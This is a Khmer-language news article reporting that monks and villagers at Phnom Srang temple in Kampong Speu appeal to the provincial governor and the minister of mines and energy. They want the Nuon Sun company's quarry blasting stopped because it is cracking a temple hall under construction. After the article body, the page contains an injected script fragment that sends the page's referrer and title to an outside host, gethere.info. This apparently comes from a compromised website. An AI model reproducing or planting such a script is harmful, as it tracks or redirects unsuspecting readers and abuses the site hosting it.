ព្រឹតិ្តការណ៍ថ្មីៗ

ព្រះសង្ឃនឹងពលរដ្ឋ អំពាវនាវសូមអោយ រដ្ឋមន្ត្រីក្រសួងរ៉ែ នឹងអភិបាលខេត្តកំពង់ស្ពឺ បញ្ឈប់ ក្រុមហ៊ុននួន សុន

2 ឆ្នាំ មុន 0 តូ សុផល

កំពង់ស្ពឺុះ អាជីវកម្មការដ្ឋានថ្មរបស់ក្រុមហ៊ុននួនសុននៅភ្នំស្រង់ ស្រុកគងពិសី កំពុងតែធ្វើឲ្យប៉ះពាល់យ៉ាងខ្លាំងដល់វត្តភ្នំស្រង់ និងការរស់នៅរបស់ប្រជាពលរដ្ឋចំណុះជើងវត្ត ហេតុនេះហើយទើបព្រះចៅអធិការវត្តភ្នំស្រង់និងពុទ្ធបរិស័ទ អំពាវនាវឲ្យលោក វ៉ី សំណាង អភិបាលខេត្តកំពង់ស្ពឺ នឹងលោក ស៊ុយ សែម រដ្ឋមន្ត្រីក្រសួងរ៉ែនឹងថាមពល ជួយដោះស្រាយពួកគាត់ជាបន្ទាន់។ ព្រះសង្ឃវត្តភ្នំស្រង់ បានឲ្យដឹងថានៅពេលក្រុមហ៊ុនដាក់រំសេវបំផ្ទុះដើម្បីយកថ្មភ្នំម្តងៗធ្វើឲ្យកក្រើកប្រេះព្រះវិហារដែលកំពង់សាងសង់ជិតរួចរាល់នៅលើភ្នំស្រង់នេះ។ ដូច្នេះហើយទើបព្រះសង្ឃនិងពុទ្ធបរិស័ទ ក៏បានអំពាវនាវផងដែរឲ្យរដ្ឋមន្ត្រីក្រសួងរ៉ែនិងថាមពល ជួយអន្តរាគមន៍ឲ្យបានឆាប់កុំឲ្យក្រុមហ៊ុននួនសុន ធ្វើអ្វីៗតាមអំពើចិត្តទៀត។

សេចក្ដីរាយការណ៍ពីពុទ្ធបរិស័ទចំណុះជើងវត្តភ្នំស្រង់ បានឲ្យដឹងថាពួកគាត់ធ្លាប់ប្ដឹងដល់សាលាស្រុកច្រើនលើកមកហើយ និងមានកិច្ចសន្យាពីក្រុមហ៊ុនផងដែរ ក៏ប៉ុន្តែលទ្ធផលគឺក្រុមហ៊ុននួនសុន នៅតែដាក់រំសេវបំផ្ទុះយកថ្មរញ្ជួយដល់ព្រះវិហារ ប្រេះស្រាំព្រះវិហារដែលកំពង់សាងសង់ថ្មី។ មន្ត្រីអាជ្ញាធរមូលដ្ឋានភូមិ-ឃុំ ក៏បានឲ្យដឹងដែរថាក្រុមហ៊ុននួនសុន បានធ្វើអាជីវកម្មកិនថ្មមិនត្រឹមត្រូវតាមលក្ខណៈបច្ចេកទេសជាយូរមកហើយ នាំឲ្យរំខានដល់ការគង់នៅរបស់ព្រះសង្ឃក្នុងវត្ត ក៏ដូចជាគណៈកម្មការវត្ត ព្រមទាំងពុទ្ធបរិស័ទចំណុះជើងវត្តជារៀងរាល់ថ្ងៃ។ អាជីវកម្មរបស់ក្រុមហ៊ុននួនសុន ដាក់រំសេវបំផ្ទុះថ្មភ្នំធ្វើឲ្យប្រេះស្រាំព្រះវិហារដែលកំពុងសាងសង់អស់បច្ច័យរាប់សិបម៉ឺនដុល្លារ មិនទាន់បានរួចរាល់និងបានធ្វើបុណ្យឆ្លងនៅឡើយ។ ហេតុនេះលោក វ៉ី សំណាង អភិបាលខេត្តកំពង់ស្ពឺ គួរចាត់វិធានការដោះស្រាយជាបន្ទាន់ដើម្បីឲ្យក្រុមហ៊ុននួនសុង អនុវត្តន៍តាមលក្ខណៈបច្ចេកទេសឲ្យបានត្រឹមត្រូវក្នុងការធ្វើអាជីវកម្មថ្មភ្នំស្រង់។

តាមមន្ត្រីអាជ្ញាធរស្រុកគងពិសី ក៏បានឲ្យដឹងដែរថាមន្ត្រីអាជ្ញាធរ ធ្លាប់កោះហៅភាគីតំណាងវត្តអារាមដែលជាដើមបណ្ដឹង និងភាគីក្រុមហ៊ុនមកសម្របសម្រួលមួយលើកជាពីរលើកមកហើយ ដើម្បីឲ្យក្រុមហ៊ុនអនុវត្តន៍តាមបទដ្ឋានបច្ចេកទេស កុំឲ្យប៉ះពាល់ដល់ទីអារាមនិងពុទ្ធបរិស័ទចំណុះជើងវត្តតទៅទៀត។ ប៉ុន្តែជាក់ស្ដែងក្រុមហ៊ុននួនសុន មិនអនុវត្តន៍ឲ្យបានត្រឹមត្រូវតាមកិច្ចសន្យានោះទេ ហើយបន្តប្រើរំសេវបំផ្ទុះយកថ្មភ្នំធ្វើឲ្យប្រេះព្រះវិហារ និងរញ្ជូយទីវត្តភ្នំស្រង់ជាបន្តបន្ទាប់ដោយគ្មានញញើតអ្វីទាំងអស់។ ដូច្នេះហើយទើបព្រះសង្ឃនិងពុទ្ធបរិស័ទចំណុះជើងវត្តភ្នំស្រង់ ស្វែងរកអន្តរាគមន៍ពីអភិបាលខេត្តកំពង់ស្ពឺ ក៏ដូចជាក្រសួងរ៉ែងនិងថាមពល ឲ្យចុះមកពិនិត្យដល់កន្លែងកើតហេតុនិងដោះស្រាយតាមជាក់ស្ដែង ធ្វើយ៉ាងណាឲ្យក្រុមហ៊ុនអនុវត្តន៍តាមបទដ្ឋានបច្ចេកទេសឲ្យបានត្រឹមត្រូវ៕

image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!